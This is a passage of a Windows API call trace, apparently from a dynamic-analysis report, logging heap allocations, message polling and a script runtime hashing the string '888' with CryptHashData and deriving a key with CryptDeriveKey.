Size=0x4) returned 0x2e54e88 [0211.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0211.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0211.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0211.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0211.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0211.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0211.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0211.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0211.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0211.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0211.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0211.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0211.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0211.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0211.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0211.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0211.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.451] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0211.451] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.451] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ea8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0211.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0211.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.451] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0211.451] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0211.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ee8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0211.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0211.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.451] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.451] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0211.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0211.452] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.452] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0211.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e509e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0211.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0211.452] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0211.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0211.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.452] CryptHashData (hHash=0xa87250, pbData=0x2e54e08, dwDataLen=0x3, dwFlags=0x1) returned 1 [0211.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0211.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0211.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0211.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0211.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0211.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0211.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0211.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0211.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0211.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0211.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0211.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0211.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0211.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0211.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0211.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0211.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0211.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0211.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0211.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0211.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0211.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0211.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0211.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0211.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0211.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0211.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0211.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0211.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0211.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0211.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0211.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0211.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0211.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0211.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0211.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0211.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0211.455] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0211.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0211.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0211.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0211.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0211.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0211.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0211.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0211.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0211.456] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.456] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0211.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0211.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0211.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0211.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0211.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0211.456] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.456] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0211.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0211.456] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0211.456] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0211.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0211.456] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0211.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0211.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0211.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0211.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50c80 [0211.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50c80, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0211.457] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87250, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87290) returned 1 [0211.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0211.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0211.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0211.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0211.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0211.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0211.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0211.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0211.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0211.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0211.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0211.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0211.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0211.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0211.457] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0211.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0211.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0211.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0211.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0211.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0211.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0211.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0211.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0211.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0211.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0211.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0211.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0211.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0211.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0211.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0211.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0211.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0211.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0211.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0211.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.458] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0211.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0211.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0211.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0211.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0211.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | 